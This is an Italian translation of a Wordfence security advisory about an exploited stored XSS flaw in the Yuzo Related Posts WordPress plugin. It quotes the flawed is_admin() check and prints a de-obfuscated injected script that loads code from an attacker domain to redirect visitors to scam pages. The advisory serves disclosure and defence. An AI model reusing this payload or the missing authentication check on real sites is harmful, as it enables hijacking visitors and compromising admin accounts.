Il plug-in WordPress Yuzo Related Posts colpito da malware

Estratto di articolo tradotto [qui l’originale in inglese] autorizzato da Wordfence che detiene il copyright dei testi. Autore Dan Moen

Il plug-in Yuzo Related Posts, installato su oltre 60.000 siti web, è stato rimosso dalla directory dei plug-in di WordPress.org il 30 marzo 2019 dopo che una vulnerabilità senza patch è stata divulgata pubblicamente e in modo irresponsabile da un ricercatore di sicurezza lo stesso giorno. La vulnerabilità, che consente lo storage cross-site scripting (XSS), viene ora sfruttata dai malintenzionati. Questi attacchi sembrano essere collegati allo stesso hacker che ha preso di mira le recenti vulnerabilità di Social Warfare e Easy WP SMTP.

Pensa alla sicurezza del tuo sito web! Contattaci

chiama 339 848 3250

La protezione XSS inclusa nel firewall di Wordfence protegge dai tentativi di exploit che si sono visti finora. Sia gli utenti di Wordfence gratuiti che Premium sono protetti da questi attacchi. Sulla base di un’analisi più approfondita dei difetti di sicurezza presenti nel plug-in, Wordfence ha anche implementato la protezione contro i vettori di attacco aggiuntivi. I clienti premium riceveranno l’aggiornamento oggi, gli utenti gratuiti fra 30 giorni.

Consigliamo a tutti gli utenti di rimuovere immediatamente il plug-in dai loro siti.

is_admin () colpisce ancora

La vulnerabilità nel plugin Yuzo Related posts deriva dalla mancata verifica dell’autenticazione nelle routine di plugin responsabili della memorizzazione delle impostazioni nel database. Il codice sottostante di assets / ilenframework / core.php è il punto cruciale del problema.

function __construct () {
if (! is_admin ()) {// solo front-end
self :: set_main_variable ();
return;
} elseif (is_admin ()) {// only admin
// imposta il valore predefinito se non esiste
self :: _ ini_ ();

Gli sviluppatori spesso usano erroneamente is_admin () per verificare se un pezzo di codice che richiede privilegi amministrativi debba essere eseguito, ma come sottolinea la documentazione di WordPress, non è così che dovrebbe essere usata la funzione. In questo scenario, self :: _ ini_ () viene chiamato su qualsiasi richiesta a una pagina di interfaccia amministrativa, inclusi /wp-admin/options-general.php e /wp-admin/admin-post.php, che consente una richiesta POST a quelli pagine da elaborare da self :: save_options (); più avanti nel codice.

Il risultato è che un utente malintenzionato non autenticato può immettere contenuti dannosi, come un payload JavaScript, nelle impostazioni del plug-in. Tale carico utile viene quindi inserito nei modelli HTML ed eseguito dal browser Web quando gli utenti visitano il sito web compromesso. Questo problema di sicurezza potrebbe essere utilizzato per defacciare i siti Web, reindirizzare i visitatori verso siti web non sicuri o compromettere gli account amministratore di WordPress, tra le altre cose.

L’exploit punta a reindirizzamenti dannosi

Undici giorni dopo che questa vulnerabilità è stata rivelata irresponsabilmente ed è stata pubblicata una dimostrazione di concetto (PoC), gli attori delle minacce hanno iniziato a sfruttare siti con installazioni di Yuzo Related Posts.

Gli exploit attualmente sfruttati iniettano JavaScript dannoso nel valore dell’opzione yuzo_related_post_css_and_style. Una volta de-offuscato, è più facile vedere cosa sta facendo lo script:

</ style> <script language = javascript> var elem = document.createElement (‘script’);
elem.type = ‘text / javascript’;
elem.async = true;
elem.src = ‘https:[hellofromhony.org]/counter’;
document.getElementsByTagName ( ‘testa’) [0] .appendChild (elem); </ script>

Quando un utente visita un sito web compromesso contenente il payload di cui sopra, verrà reindirizzato alle pagine di supporto tecnico malintenzionato. Come da immagine:

Tre vulnerabilità con molto in comune

La nostra analisi mostra che i tentativi di sfruttare questa vulnerabilità condividono una serie di elementi comuni con attacchi a due altre vulnerabilità scoperte in altri plugin: Social Warfare e Easy WP SMTP.

Gli exploit finora hanno utilizzato uno script dannoso ospitato su hello|from|hony [.] Org, che risolve fino a 176.123.9 [.] 53. Lo stesso indirizzo IP è stato utilizzato nelle campagne Social Warfare e Easy WP SMTP. Inoltre, tutte e tre le campagne hanno comportato lo sfruttamento delle vulnerabilità di archiviazione XSS e hanno implementato reindirizzamenti dannosi. Siamo fiduciosi che le tattiche, le tecniche e le procedure (TTP) in tutti e tre gli attacchi puntano a un attore comune delle minacce.

Conclusione

Come accaduto poche settimane fa, le azioni irresponsabili di un ricercatore di sicurezza hanno portato alla vulnerabilità di un plug-in zero-day. Casi come questo sottolineano l’importanza di un approccio di sicurezza a strati che include un firewall WordPress.

I proprietari di siti che utilizzano il  plugin WordPress Yuzo Related Posts sono invitati a rimuoverlo immediatamente dai loro siti, almeno fino a quando una correzione non sia stata pubblicata dall’autore.

I clienti di Wordfence Premium e gli utenti gratuiti sono stati protetti dagli attacchi attuali che stiamo vedendo online. Un’ulteriore regola del firewall per la protezione contro gli exploit alternativi è stata sviluppata e distribuita ai nostri clienti Premium oggi e sarà disponibile per gli utenti gratuiti fra 30 giorni.

Estratto di articolo tradotto [qui l’originale in inglese] autorizzato da Wordfence che detiene il copyright dei testi. Autore Dan Moen

Hai un problema di sicurezza? Richiedi un preventivo

Servizi professionali a partire da 100,00 € + IVA

Se vuoi condividere la tua esperienza sul caso, commenta sotto.

Articolo apparso per la prima volta in www.fedegrafia.com il 11/04/2019, la notizia può essere condivisa attraverso link con attribuzione all’autore. Non può in ogni caso essere copiata senza autorizzazione.